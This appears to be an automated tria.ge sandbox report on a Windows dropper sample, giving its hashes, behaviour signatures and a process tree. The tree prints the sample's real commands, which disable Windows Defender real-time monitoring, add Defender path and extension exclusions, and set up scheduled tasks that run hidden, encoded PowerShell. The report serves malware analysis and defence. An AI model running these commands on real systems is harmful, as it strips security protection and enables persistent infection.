Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    201s
  • max time network
    202s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    22/07/2024, 05:12 UTC

General

  • Target

    b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe

  • Size

    7.2MB

  • MD5

    7f19c9c2900a42a22935eda2a8399084

  • SHA1

    73509d0c7d2622167aa308de5d23dcced192c5df

  • SHA256

    b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3

  • SHA512

    62e10a813c0205c986ac41b443d6b32d8ce8d6d3a3943142147431965e10a2cc3d6919b71843a329aa3914e2d8a4a158d52475ca1cbee8a9f030562694bba95c

  • SSDEEP

    196608:91OeNXiH6xUi1X18htRrPIPX2zSB23e0d:3OwXK6xLpivPY2zOwes

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 24 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe
    "C:\Users\Admin\AppData\Local\Temp\b9f94d6984abb1e280ddeb0e9eb638cb3d64f265049a6eff6337cd65fb7181b3.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Users\Admin\AppData\Local\Temp\7zSCC35.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2376
      • C:\Users\Admin\AppData\Local\Temp\7zSCDCA.tmp\Install.exe
        .\Install.exe /ZwkdidgjGba "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2464
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2848
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2852
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2736
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bbMwfSaEkvrmTtNtmp" /SC once /ST 05:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe\XNGbWYsbbEbynxB\ikkfONE.exe\" cK /msRididIcQ 525403 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:2336
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 504
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1004
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {19DAB8F3-616D-424D-A3F4-4F8A8809284F} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2560
    • C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe\XNGbWYsbbEbynxB\ikkfONE.exe
      C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe\XNGbWYsbbEbynxB\ikkfONE.exe cK /msRididIcQ 525403 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gCslMOAcq" /SC once /ST 02:15:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2020
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gCslMOAcq"
        3⤵
          PID:1712
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gCslMOAcq"
          3⤵
            PID:2984
          • C:\Windows\SysWOW64\cmd.exe
            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            3⤵
              PID:464
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:1932
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
              3⤵
                PID:1636
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:2944
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gEqEqakXx" /SC once /ST 02:25:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2016
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gEqEqakXx"
                3⤵
                  PID:752
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /DELETE /F /TN "gEqEqakXx"
                  3⤵
                    PID:2444
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                    3⤵
                      PID:1924
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                        4⤵
                          PID:1624
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1528
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                              6⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:984
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32
                        3⤵
                          PID:2516
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32
                            4⤵
                            • Windows security bypass
                            PID:3008
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64
                          3⤵
                            PID:1936
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64
                              4⤵
                              • Windows security bypass
                              PID:864
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32
                            3⤵
                              PID:2760
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32
                                4⤵
                                  PID:2824
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                  PID:2836
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                      PID:2892
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C copy nul "C:\Windows\Temp\QpEhKTiRofuFzpEd\xJZbFTiH\HOoBbSzDWzqHdGzU.wsf"
                                    3⤵
                                      PID:2884
                                    • C:\Windows\SysWOW64\wscript.exe
                                      wscript "C:\Windows\Temp\QpEhKTiRofuFzpEd\xJZbFTiH\HOoBbSzDWzqHdGzU.wsf"
                                      3⤵
                                      • Modifies data under HKEY_USERS
                                      PID:2860
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2636
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2880
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2660
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2416
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2368
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2012
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2664
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2004
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1740
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2680
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2340
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1700
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1660
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1556
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:540
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2932
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2948
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2240
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                          PID:2244
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CYZcjjLrQSSSC" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                            PID:300
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:2980
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EUXfJBljbcUn" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:1932
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:2944
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MaCEdJmjU" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:620
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:1780
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\esZXvMCNuGEfqJuxklR" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                        PID:2028
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                          PID:2208
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWTlFEDWyZjU2" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1032
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:924
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hDwfgHvtnjxOxeVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:1060
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:1312
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2380
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:1548
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AMZQderRxIruGTREe" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:1068
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:916
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QpEhKTiRofuFzpEd" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                            PID:2220
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gVyHgzwqh" /SC once /ST 04:19:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2444
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gVyHgzwqh"
                                                                          3⤵
                                                                            PID:1608
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gVyHgzwqh"
                                                                            3⤵
                                                                              PID:2748
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                              3⤵
                                                                                PID:2636
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                  4⤵
                                                                                    PID:2160
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                  3⤵
                                                                                    PID:2460
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                      4⤵
                                                                                        PID:2124
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /CREATE /TN "LTdmnWMddFrWELagp" /SC once /ST 01:01:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\pjDElFp.exe\" aK /QhUOdidwt 525403 /S" /V1 /F
                                                                                      3⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:2660
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /run /I /tn "LTdmnWMddFrWELagp"
                                                                                      3⤵
                                                                                        PID:2612
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 484
                                                                                        3⤵
                                                                                        • Loads dropped DLL
                                                                                        • Program crash
                                                                                        PID:2684
                                                                                    • C:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\pjDElFp.exe
                                                                                      C:\Windows\Temp\QpEhKTiRofuFzpEd\NeoVxqNkrzcyHFJ\pjDElFp.exe aK /QhUOdidwt 525403 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:2664
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bbMwfSaEkvrmTtNtmp"
                                                                                        3⤵
                                                                                          PID:2020
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:1976
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:2700
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:872
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1700
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
